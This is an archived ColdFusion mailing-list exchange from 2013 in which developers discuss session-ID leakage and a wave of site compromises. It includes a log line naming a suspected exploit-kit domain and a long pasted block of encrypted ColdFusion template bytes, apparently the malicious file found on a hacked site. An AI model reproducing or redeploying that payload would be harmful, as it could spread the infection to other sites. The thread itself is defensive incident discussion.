Re: Anyway to automatically convert to URLSESSIONFORMAT

2013-02-10 Thread Cameron Childress 

On Sat, Feb 9, 2013 at 7:55 PM, UXB denn...@uxbinternet.com wrote:

 From a security perspective cookies are a better option because passing
 ID's in the open can result in session hijacking when someone bookmarks a
 link.


This isn't even the biggest threat. Since you are passing the SessionID in
the URL, it will be included in the referrer string and LOGGED by someone
else's server each time you allow a link out from your website. This
appears to be the root cause of the recent Yahoo Mail security breaches.

This means if you simply link to my website from yours, using a plain jane
link - this is all that is required for me to potentially hijack your
user's sessions, simply by examining the referrer strings.

-Cameron

-- 
Cameron Childress
--
p:   678.637.5072
im: cameroncf
facebook http://www.facebook.com/cameroncf |
twitterhttp://twitter.com/cameronc |
google+ https://profiles.google.com/u/0/117829379451708140985


~|
Order the Adobe Coldfusion Anthology now!
http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion
Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354442
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm

New Round of Exploits going on

2013-02-10 Thread Andrew Scott 

It appears that there are either Web Developers running sites with current
infections, or there is a new round happening.

I have seen one site hacked twice in the last two weeks, and although they
were never able to run the code, there is very little evidence that this
exploit is from the web site it was found on.

However the one thing that I noticed in the logs at the time of the
modified HTML file, and yes they only modified HTML files and not CFML
files, was that I found a HEAD request in the logs that came from a website
that looked suspicious. When I googled this domain my AntiVirus detected
this as a Black Hole Security Exploit, but what was worrying was that this
log with the domain had the website that was hacked in the log. And it
looks like this with the details changed to protect both parties.

2013-02-06 01:43:48 xxx.xxx.xxx.xxx HEAD / - 80 - xxx.xxx.xxx.xxx
Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:18.0)+Gecko/20100101+Firefox/18.0
http://somedomain/?info/d http://luhafaki.eg.vg/?info/andyscott.id.au
omainattacked 301 0 0 225 432 125

Now you can see that this was redirected, but if there is a known exploit
these guys are still able to do this. As was evident with the latest
Anonymous attacks.

I encourage people to look at their websites and check to see if they have
been infected with this new wave. I have gone through the logs of the
website in question and there is no evidence that it was infected directly
through the website, except for that one line in the log mentioned above.

What really shocks me even more, is that the hosting company refuse
to acknowledge that they may be responsible, which is fair enough if this
website did not have all the checks to sanitize all form inputs with Anti
Sammy. And there is also no evidence that this a SQL Injected attack
either, which is near impossible unless there is a known bug with hibernate
and its current binding of variables. Aka cfqueryparam for hibernate.

Anyway as some people have mentioned that they have been attacked in the
last few weeks, I wanted to share this as there seems to be a new exploit
going around that may or may not be related to ColdFusion on shared hosts,
but they seem to not care who they are infecting.


-- 
Regards,
Andrew Scott
WebSite: http://www.andyscott.id.au/
Google+:  http://plus.google.com/113032480415921517411


~|
Order the Adobe Coldfusion Anthology now!
http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion
Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354443
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm

Re: New Round of Exploits going on

2013-02-10 Thread Les Mizzell 

I just got the below on a site. Not sure how to decrypt to tell exactly 
what it's doing though.
Client noticed that Google had flagged the site as 'comprimised.

I'm pointing my finger at the hosting company - they've got a security 
issue if this can happen, correct?

So, anybody know what this is doing?

-

Allaire Cold Fusion Template
Header Size: New 
Version@ؤlº²BÊulYLöŠhqؤä8X°ɿÌò©‰P^qvßNÊ҇ùFÍû'ÉÊՔ¯Èe
ÜØúÄá”û!Çp$s㨒ôû”\v‰ùeÐ×åRV/е ú{ 
/ý‡èó^t¼ɮ?žÝtnŠö”³zñ¤î:XÌ֙Ó(ËÕÂ~)ۣ·Œ*‹ 
ì€ 
·mîQPêlœ­wré(²-ì˜~s ‡#ó(B]±nwÃí¸•a TGm­æalW][÷* 
Iû(þºú¢ہ@”‰Íþk äF±‰î®l‘XFLõR±, 
҂…¹ԁ(]{šÁK~9î®l‘XFLõR±, ˜éâ¡[V8cü_èQK^ 
¦[AêÝ׻áº8'¹ïVŒcKWÅéÁÖU€hL½
.øá¡R¾ÒWxþ™öî®l‘XFLõR±, ˜TXÉÅ8Öëx«Ç=! 
䱞Wܳ§›YªØå«#}yµ'X› 
X·šæNåVÆͼ¿%V#‚6ŸÂ7Ì 
OÊ)€æ*#pPOëPpŒžWܳ§›YªØåÅO“TFÀe„› X·ð
ëo2]ƒͼ¿%V#‚6ŸÂ7Ì 
‡áqtÙu!qö¬òˆ:Ã'H—Nî®l‘XFLõR±, 
ʍƬ³š,’8rR+áœ;¦fTm{$5fIHpOÕÏ-K©o+ÏE$f*훆œv™ÔB¥¦fTm{$5fIHpOÕ@¥ÉϚ~y`lÆjÃ0z\¸ÿꬃ©ô³¥pEߵÒ/HÊÝS¸¿-ؕ3úœ¼äU³ÐÁ׻áº8'¹ïVŒcKWN¡sdDg‘ÑùAjƒ¥×y³Õ¿°Ó{Kî®l‘XFLõR±,
 
•ñ*Þr„?ݮ—Év¬ì‘Íg¡$Â9„î®l‘XFLõR±, 
:6ôԸTœ¼}ÝbG¦`ðî¦fTm{$5fIHpOÕ8`Ӆº2Öяÿ¬@àÎ}V|̽…
\¸ÿꬃ©ô³¥pEߵÒ/ŊԽæCϯ£’jKNö׻áº8'¹ïVŒcKWì¾ïNüÏ1¨--£s©sK‹ðåW׻áº8'¹ïVŒcKWá?‹ÍÍ›
 
X·TôÒ^©ª»`ͼ¿%V#‚6ŸÂ7Ì Â}£d
½¬p!²E¤ñߴdŠ`'8OYgՊ=â/n׻áº8'¹ïVŒcKWRÏ¥t‘‘› 
X·fJc—lþ¸fͼ¿%V#‚6ŸÂ7Ì ‡ը
R,`Î޷M^Rœ¯ê}Oæ‘Ìͼ¿%V#‚6ŸÂ7Ì 
Íi7pԳ´¯ˆš¢ÿ*\¸ÿꬃ©ô³¥pEߵÒ/ðu§½(OÍ祹Í3 
ÕpÓÜæ7\¸ÿꬃ©ô³¥pEߵÒ/gQ 
ú÷缋ýquv6TžWܳ§›YªØåY~’›¡Xm»¸ã4ÿöèyoy@QvUcS`׻áº8'¹ïVŒcKWg“SáÑÓ›
 
X·Dü¥Ñíöͼ¿%V#‚6ŸÂ7Ì 
•#âvû±‰â8³GԞWܳ§›YªØåY~’›¡Xm»ʍƬ³š,}B½à
s­¦fTm{$5fIHpOÕddÜ 
šµ'×l—˜ҽrm[,
Ìå;ò:WÄçåöbyœ©E 
¦¨Y!Æ#šÅ
YsK˜ُ;/׻áº8'¹ïVŒcKWŠˆyó±ý•:5IY4)ÄAý!x²Í׻áº8'¹ïVŒcKWCrFõîZ½›
 
X·òØ⟬Mͼ¿%V#‚6ŸÂ7Ì 
šð×÷¥ºBú÷ƒj±­׻áº8'¹ïVŒcKWå}°mb¿› 
X·ï3Êõ$´ÛÎͼ¿%V#‚6ŸÂ7Ì Íeh' wðô޲©é;gZCE
¸£whpî®l‘XFLõR±, 8;Îù]¾¿¼0î$èìWÄçåöbyœ©E 
¦¨Y¢p$¸XëÄn
ŒÑng»‚·N0ì\¸ÿꬃ©ô³¥pEߵÒ/´—ýùßÄYD¦ŠŸš°žWܳ§›YªØåc×S¶‹HI-—Œ0uü˜ÒKþÝÍR‘•B‡ÑÄc‹)¦ͼ¿%V#‚6ŸÂ7Ì
 
«.Z–éÝ/ƒœ_N.G…
|J\¸ÿꬃ©ô³¥pEߵÒ/_]\Õù–öçOÖԉù¼DZ¡œBé0¦fTm{$5fIHpOՅ
ãDøS‹4C¬Û2£3†.­æalW][÷* 
ó–2¢žôà€X¨Ĝ—UNM±…§é¥÷–׻áº8'¹ïVŒcKWZ¸;å´ü› 
X·;ËQ|dKͼ¿%V#‚6ŸÂ7Ì 
¤PÖ¯©õÞS5ñÞBœ£P1²¿”žWܳ§›YªØåc×S¶‹HIxœ)«%Pý²v1°×á¦fTm{$5fIHpOդaÏQz]¬[ç@ºÐìéfæ›.DÁgä/WÄçåöbyœ©EÂ
 
¦¨Yn.—‹ÉrHýSámí.Z׻áº8'¹ïVŒcKW»Ê.Hú®c:5IY4)Ä4Çݪ'H—Nî®l‘XFLõR±,
 
¥ã‰J¥3Š±‹ŽTEWÄçåöbyœ©E 
¦¨YºùÞØÅ
ԩÈ[ÑîX¢EáYeÆlúîïlžWܳ§›YªØåc×S¶‹HI{±ñévø›9}¦
 _¦fTm{$5fIHpOÕn˜aîó(Wœ†+úÞ 

¥N—Î\#ÆWÄçåöbyœ©E 
¦¨Y)‚ÂO—ÇpÔ)æÞÆØ׻áº8'¹ïVŒcKWôåßAãåÑ:5IY4)ÄßJ֔¥ô׻áº8'¹ïVŒcKWõºþðA\õ›
 
X·Ë!þFs¸!eͼ¿%V#‚6ŸÂ7Ì 
þﱕþw0wQЀQ”wGݑeSyǓð¯¦fTm{$5fIHpOբSÄò 
¤qòðë–1ˆxO…­æalW][÷* 
9®Fó“BWQɄl0ʏËÎvñ™óÒ\¸ÿꬃ©ô³¥pEߵÒ/
WHšq˜²¦¹ÿÀomÀòžWܳ§›YªØå«#}yµ'X˜éâ¡[V8cÊ 
I¼ŠL“dӽóývö­æalW][÷* 0–I
™ñ}_p6R¯

]Ðî®l‘XFLõR±, Zq٭ZTgW¥åø[\…f´qêWÄçåöbyœ©E 
¦¨Y0‰
Fã‘4÷ÉzèԶA¢׻áº8'¹ïVŒcKW4ðGTê¤+·:5IY4)ÄHmûŠ=Oќ±ì{E
 
Ü2ͼ¿%V#‚6ŸÂ7Ì 
~×ëБ´^'×\¸ÿꬃ©ô³¥pEߵÒ/‡¼tmAZmgäi£Ãm6lü“ƒ­æalW][÷*
 
b²?ÉÚ r;ñ}_ÒÊ6wÝuÎdî®l‘XFLõR±, 
ûýz†.œi­½$þ—*j9 
'‚¨žWܳ§›YªØå«#}yµ'XΞQ¿(վ÷—åئfTm{$5fIHpOÕÑjr$¿ßÓÀûI£ä£G
 
ër’‚}Û+DžWܳ§›YªØå«#}yµ'X{±ñévøTùdv§òi˜¦fTm{$5fIHpOÕØî¯Tȯûk.1
 
L½ð¹žWܳ§›YªØå«#}yµ'X:6ôԸTœ¼/*²-¦fTm{$5fIHpO՝²;É70yÎ\^«år‘ƒr2þOTWÄçåöbyœ©EÂ
 
¦¨Y5 w–Ëٞ
ÒóìyÞU2׻áº8'¹ïVŒcKWýº²´ˆ…
?:5IY4)ă^(·:;h­æalW][÷* ­E3 
)¨hkeF²Ód™1OOåò î®l‘XFLõR±, ™YòŽÇ[cÖ 
ûäé‘ÿ¿C|ÑÕq­æalW][÷* À(Êõ#|Q
»s7EH”èyvà²Üaî®l‘XFLõR±,

Re: New Round of Exploits going on

2013-02-10 Thread Andrew Scott 

One thing I hate about some hosting companies is that they have Robust
Exceptions switched on, but what concerns me even more is that they don't
care that this is a security risk... If your hosting company is one of
them, get in their ears about having it switched off.

If they refuse then its time for a change.

Also as a caution not a rule, if your lucky enough to have the time, look
into using any framework that supports MVC and SES rewrites, this has
stopped them in their tracks as they are not able to run the uploaded code.
Not with ease at least anyway.

Still I am not sure how they are uploading these files, as there is nothing
in the logs that indicates this. I am guessing that something else on the
server is compromised and because they are able to and do look for
exceptions being displayed to the screen they now know where to start
spreading their malware. My guess is there is an exploit still know and not
public that is bypassing all sand boxing at the moment.


-- 
Regards,
Andrew Scott
WebSite: http://www.andyscott.id.au/
Google+:  http://plus.google.com/113032480415921517411


~|
Order the Adobe Coldfusion Anthology now!
http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion
Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354445
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm

Re: New Round of Exploits going on

2013-02-10 Thread Les Mizzell 

  Still I am not sure how they are uploading these files
  as there is nothing in the logs that indicates this.

For mine in the previous message, the altered file still had the 
ORIGINAL creation date on it - 2011 something - although it was altered 
last week. So, a search of all the site files for anything recently 
altered showed nothing.

~|
Order the Adobe Coldfusion Anthology now!
http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion
Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354446
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm

Re: New Round of Exploits going on

2013-02-10 Thread Andrew Scott 

That would indicate that they where able to get the file stamp before
modifying it and reapplying the time stamp Extreme long shot, but who
knows how they are doing this.

-- 
Regards,
Andrew Scott
WebSite: http://www.andyscott.id.au/
Google+:  http://plus.google.com/113032480415921517411


On Mon, Feb 11, 2013 at 4:43 PM, Les Mizzell lesm...@bellsouth.net wrote:


   Still I am not sure how they are uploading these files
   as there is nothing in the logs that indicates this.

 For mine in the previous message, the altered file still had the
 ORIGINAL creation date on it - 2011 something - although it was altered
 last week. So, a search of all the site files for anything recently
 altered showed nothing.

 

~|
Order the Adobe Coldfusion Anthology now!
http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion
Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354447
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm